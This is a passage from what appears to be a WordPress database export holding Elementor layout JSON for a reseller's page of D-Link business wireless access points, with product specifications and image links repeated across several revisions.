port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0e6f8e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62f238e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ecbb61f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89c052d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bee4f1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0dd89dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a8eceff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cea9196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"932549b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b9b1275\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"008ef23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"671f8ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7a8833d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dbc3f40\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"93fc91a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d70abb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d3625d1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8c8530\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd07de7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9a1a792\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96783a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a58efa2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65475d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239e245\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"942c9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3497,2637,'_wp_page_template','template-fullwidth.php'),(3498,2637,'_elementor_edit_mode','builder'),(3499,2637,'_elementor_template_type','post'),(3500,2637,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a58efa2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65475d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239e245\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"942c9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3481,2635,'_wp_page_template','template-fullwidth.php'),(3485,2635,'_elementor_version','0.4'),(3501,2637,'_elementor_version','0.4'),(3504,2638,'_wp_page_template','template-fullwidth.php'),(3505,2638,'_elementor_edit_mode','builder'),(3506,2638,'_elementor_template_type','post'),(3507,2638,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range 